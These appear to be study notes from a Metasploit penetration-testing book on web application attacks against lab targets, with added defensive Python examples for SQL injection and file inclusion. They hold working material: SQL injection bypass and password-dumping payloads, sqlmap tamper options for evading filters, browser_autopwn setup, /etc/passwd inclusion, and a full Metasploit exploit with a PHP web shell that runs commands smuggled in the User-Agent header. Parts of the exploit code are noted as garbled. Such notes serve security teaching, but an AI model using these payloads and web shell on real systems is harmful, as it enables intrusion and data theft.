# Notes on 《Metasploit渗透测试魔鬼训练营》 (Metasploit Penetration Testing Devil Training Camp): Web Application Penetration
Contents
- Web application weaknesses
- OWASP Top 10 web vulnerabilities
- Metasploit web application penetration techniques
- Web application vulnerability scanning
- Open-source tools
- W3AF
- SQL injection
- sqlmap
- Injection
- Cross-site scripting
- autopwn
- Command injection
- Creating your own module
- File inclusion
- Scanning: wpscan for WordPress, joomscan for Joomla
## Web application weaknesses
- Ubiquity
- Low technical barrier
- Firewalls can be bypassed
- Immature security mechanisms
- Stealth
- Variability
- Profit motive
## OWASP Top 10 web vulnerabilities
- SQL injection
- Cross-site scripting
- Cross-site request forgery
- Broken authentication and session management
- Security misconfiguration
- Insecure password storage
- Insecure direct object references
- Failure to restrict URL access
- Insufficient transport layer protection
- Unvalidated redirects and forwards
## Metasploit web application penetration techniques
- Auxiliary modules

```
msf > load wmap
> help
> # scan with wmap
> wmap_sites -a http://xxxx
> wmap_sites -l
> wmap_targets -t http://xxx
> wmap_run -t
> wmap_run -e # view results
> vulns # list vulnerabilities
# HTTP Trace Method Allowed
```

- Exploit modules: `exploit/unix/webapp`, `exploit/windows/http`, `exploit/multi/http`
| Tool | Function | Notes |
|---|---|---|
| W3AF | Comprehensive web application scanning and auditing tool | |
| SQLMap | SQL injection | |
| wXf | Open-source web penetration testing framework | Same structure as msf |
| XSSF | Cross-site scripting analysis | |
| BeEF | Browser exploitation framework | |
## Web application vulnerability scanning
### Open-source tools
- Arachni
- Grabber-Scan
- Wapiti
- Zed Attack Proxy
- Skipfish
- W3AF
- Sandcat Free Edition
- Paros
- Burp Suite Free
- WATOBO
### W3AF
- Discovery modules: gather HTTP information and fingerprint the server, database and web application firewall. webSpider crawls every link and form on the site.
- Brute-force modules
- Audit modules: used to detect vulnerabilities
- Mangle (modification) modules
- Attack modules
- Output modules
- Evasion modules: used to evade intrusion detection

```shell
# install
git clone --depth 1 https://gitee.com/duaneya/w3af.git
cd w3af
./w3af_gui
```
## SQL injection
### sqlmap

```
admin' or '1=1 # login
```

```
# SQLmap
msf > sqlmap -u 'http://xxx' --cookie='' # use the Tamper Data plugin to capture the cookie
> sqlmap -u '' --cookie='' --dbs -v 0
> # found the databases dvwa and information_schema
> -D dvwa --tables
> # got guestbook and users
> -D dvwa --tables -T users --columns
```

Common options:
- `--dump`: export data; `-u`: a single URL; `-m xx.txt`: multiple URLs from a file
- `-d "mysql://user:password@10.10.10.137:3306/dvwa"`: act as a database client and connect to the database directly
- `--data`: works for both POST and GET
- `-p`: specify the parameter(s) to test
- `-r`: read the request from a file
- `-f`: fingerprint the DBMS
- `--tamper`: obfuscation scripts, used to get past application-layer filtering
- `--cookie`, `--user-agent`, `--host`, etc.: modify HTTP headers
- `--threads`: number of concurrent threads, default 1
- `--dbms MySQL<5.0>`: specify the DBMS or its version
- `--level=LEVEL`: level of tests to perform (1-5, default 1)
- `--risk=RISK`: risk of tests to perform (0-3, default 1); a higher risk can cause data to be modified
- `--current-db`: get the current database name
- `--dbs`: enumerate the DBMS databases
- `--tables`: enumerate the tables of a DBMS database
- `--columns`: enumerate the columns of a DBMS table
- `-D DB`: database to enumerate
- `-T TBL`: table to enumerate
- `-C COL`: column to enumerate
- `-U USER`: database user to enumerate

Common tamper scripts (local reference: sqlmap-tamper分类.xlsx):
- `base64encode.py`: base64-encode the payload
- `charencode.py`: URL-encode
- `chardoubleencode.py`: double URL-encode
- `unmagicquotes.py`: wide-byte (multibyte) bypass
- `randomcomments.py`: split SQL keywords with `/**/`
- `space2plus.py`, `space2comment.py`, `space2xxxx.py`: replace spaces with xx
### Injection
Mind the trailing space (MySQL requires whitespace after `--`).

| Input | Output |
|---|---|
| `'` | |
| `1'` | |
| `1''` | |
| `' or '1=1` | |
| `' union select 1,2 --'` | |
| `' union select 1,table_name from INFORMATION_SCHEMA.tables -- '` | |
| `' union select 1,column_name from INFORMATION_SCHEMA.columns where table_name = 'users' -- '` | |
| `' union select null,password from users -- '` | |
| `union select password,concat(first_name,' ',last_name,' ',user) from users -- '` | |
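To show, from the defender's side, why the login bypass and the union probes above work and what stops them, here is an added example (not from the book or these notes) using Python's built-in sqlite3 as a stand-in for DVWA's MySQL `users` table; the table contents and the exact query shapes are assumptions.

```python
import sqlite3

# Constructed stand-in for DVWA's 'users' table (rows are made up; a real table
# would hold password hashes, plaintext is used only to keep the example short).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT,"
               " first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "admin", "password", "admin", "admin"),
        (2, "gordonb", "abc123", "Gordon", "Brown"),
    ])
    return db

def login_vulnerable(db, user, password):
    # Input is pasted into the SQL text: the quote in user closes the literal,
    # so admin' or '1=1 turns the WHERE clause into
    #   user='admin' or '1=1' AND password='...'
    # and the admin row matches whatever password was supplied.
    sql = f"SELECT user FROM users WHERE user='{user}' AND password='{password}'"
    return [row[0] for row in db.execute(sql)]

def login_safe(db, user, password):
    # Bound parameters: values travel as data, the SQL text never changes.
    sql = "SELECT user FROM users WHERE user=? AND password=?"
    return [row[0] for row in db.execute(sql, (user, password))]

def lookup_vulnerable(db, user_id):
    # Same flaw in a DVWA-style user lookup: a two-column UNION appends rows
    # from any table, which is how the union probes above leak the password column.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id='{user_id}'"
    return list(db.execute(sql))

def lookup_safe(db, user_id):
    sql = "SELECT first_name, last_name FROM users WHERE user_id=?"
    return list(db.execute(sql, (user_id,)))

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin' or '1=1", "wrong"))  # ['admin']
    print(login_safe(db, "admin' or '1=1", "wrong"))        # []
    probe = "' union select null,password from users -- '"
    print(lookup_vulnerable(db, probe))  # password column leaked
    print(lookup_safe(db, probe))        # []
```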
## Cross-site scripting
### autopwn

```
msf > use auxiliary/server/browser_autopwn
> set LHOST xxx
> set SRVHOST xxx
> set SRVPORT xxx
> exploit
> jobs
> sessions
> sessions -i 1
```
## Command injection
### Creating your own module
- Use `reload` to reload the current module
- Module names must be lowercase, with words separated by `_`
- Use `reload_all` to reload all modules
- Use `edit` to edit the current module
`/usr/share/metasploit-framework/modules/exploits/unix/webapp/wordpress_zabbix_plugin_new.rb`

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress ',
      'Description'    => %q{jkjkl},
      'Author'         =>
        [
          'Unknown', # Identify yourself || send an PR here
        ],
      'License'        => MSF_LICENSE,
      'References'     => [],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          'Space'       => 500
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Automatic', {}]],
      'DisclosureDate' => 'Oxx',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('URI', [true, 'uri', '/']),
      ], self.class)
  end

  def exploit
    url = datastore['URI']
    remotehost = datastore['RHOST']

    # fetch the file manager page and read the current folder path out of it
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php",
    })
    directory = res.body.scan(/currentFolderPath" value="([^"]*)"/)

    code = "selectedDoc[]=#{payload.encoded}&currentFolderPath=#{directory.first.first}"
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_file_cut.php",
      'data'   => "#{code}",
    })
    cookie = res.headers['Set-Cookie'].split(";")

    dirname = Rex::Text.rand_text_alpha(8)
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php",
      'data'   => "new_folder=#{dirname}&currentFolderPath=#{directory.first.first}",
    })

    filename = Rex::Text.rand_text_alpha(8)
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php",
      'cookie' => "#{cookie[0]}",
      'data'   => "value=#(unknown)&id=#{directory.first.first}#{dirname}", # value kept exactly as it appears in the notes
    })

    # interactive loop: each command goes base64-encoded in the User-Agent header
    while(1)
      print "#"
      cmd = gets
      if cmd.include?("exit")
        break
      end
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => "#{url}/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/inc/data.php",
        'agent'  => "#{Rex::Text.encode_base64("#{cmd}")}\r\n",
      })
      data = res.body.split("_code_")[1]
      puts data # the delimiter of the original trailing split(...) call was lost in the source
    end
  end
end
```
`/usr/share/metasploit-framework/modules/payloads/singles/php/shell_php.rb`

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'

module MetasploitModule
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Payload::Php

  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'PHP Shell',
      'Description' => 'zzzzzzzz',
      'Author'      => 'egypt',
      'License'     => BSD_LICENSE,
      'Platform'    => 'php',
      'Arch'        => ARCH_PHP,
    ))
  end

  #
  # Issues
  #  - Since each command is executed in a new shell, 'cd' does nothing.
  #    Perhaps it should be special-cased to call chdir()
  #  - Tries to get around disable_functions but makes no attempts to
  #    circumvent safe mode.
  #
  def php_shell
    shell = <<-END_OF_PHP_CODE
<?php error_reporting(1); print(_code_); passthru(base64_decode(\$_SERVER[HTTP_USER_AGENT])); die; ?>
    END_OF_PHP_CODE
    return Rex::Text.compress(shell)
  end

  def generate
    return php_shell
  end
end
```
## File inclusion

```
http://10.10.10.129/dvwa/vulnerabilities/fi/?page=/etc/passwd
```

If the Apache server is configured with allow_url_include, a remote URL can be used directly.
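As an added example on the defensive side (not from the book or these notes), here is how a `page` parameter like the one above can be restricted to an allow-list, and how the same check can be run over access-log lines to flag local and remote inclusion attempts; the include directory, the page names and the log format are assumptions.

```python
import os
from urllib.parse import urlparse, parse_qs

# Assumed include directory and page allow-list (constructed, not DVWA's real layout).
PAGE_DIR = "/var/www/dvwa/vulnerabilities/fi"
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php"}

def resolve_page(page):
    """Map the ?page= value to a file that may be included, or raise ValueError."""
    if not page or "\x00" in page:
        raise ValueError("empty or NUL-containing page name")
    # Remote include (allow_url_include): refuse anything carrying a URL scheme,
    # which also covers php:// and data:// style wrappers.
    if urlparse(page).scheme:
        raise ValueError("remote include refused")
    # An allow-list of bare file names beats filtering '../' or a leading '/':
    # /etc/passwd and ../../etc/passwd simply are not on the list.
    if page not in ALLOWED_PAGES:
        raise ValueError("page not in allow-list")
    full = os.path.realpath(os.path.join(PAGE_DIR, page))
    # Belt and braces: the resolved path must still sit directly under PAGE_DIR.
    if os.path.dirname(full) != os.path.realpath(PAGE_DIR):
        raise ValueError("resolved path escapes include directory")
    return full

def flag_requests(log_lines):
    """Return (line_no, page, reason) for entries whose page= value is rejected."""
    flagged = []
    for n, line in enumerate(log_lines, 1):
        fields = line.split()
        if len(fields) < 2:
            continue
        query = urlparse(fields[1]).query
        for page in parse_qs(query, keep_blank_values=True).get("page", []):
            try:
                resolve_page(page)
            except ValueError as err:
                flagged.append((n, page, str(err)))
    return flagged

# Constructed access-log excerpt in a simplified 'METHOD path' form.
SAMPLE_LOG = [
    "GET /dvwa/vulnerabilities/fi/?page=file1.php",
    "GET /dvwa/vulnerabilities/fi/?page=/etc/passwd",
    "GET /dvwa/vulnerabilities/fi/?page=../../../../etc/passwd",
    "GET /dvwa/vulnerabilities/fi/?page=http://example.invalid/x.txt",
]
```

Calling `flag_requests(SAMPLE_LOG)` reports lines 2 and 3 as not on the allow-list and line 4 as a refused remote include.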
## Scanning: wpscan for WordPress, joomscan for Joomla
```
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.10.129/wordpress/ [10.10.10.129]
[+] Started: Wed May 13 14:05:10 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1
 |  - X-Powered-By: PHP/5.3.2-1ubuntu4.5
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.129/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://10.10.10.129/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.10.129/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.129/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 3.3.1 identified (Insecure, released on 2012-01-03).
 | Found By: Meta Generator (Passive Detection)
 |  - http://10.10.10.129/wordpress/, Match: 'WordPress 3.3.1'
 | Confirmed By: Atom Generator (Aggressive Detection)
 |  - http://10.10.10.129/wordpress/?feed=atom, <generator uri="http://wordpress.org/" version="3.3.1">WordPress</generator>

[i] The main theme could not be detected.

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed May 13 14:05:33 2020
[+] Requests Done: 29
[+] Cached Requests: 4
[+] Data Sent: 7.946 KB
[+] Data Received: 50.355 KB
[+] Memory used: 97.496 MB
[+] Elapsed time: 00:00:22
```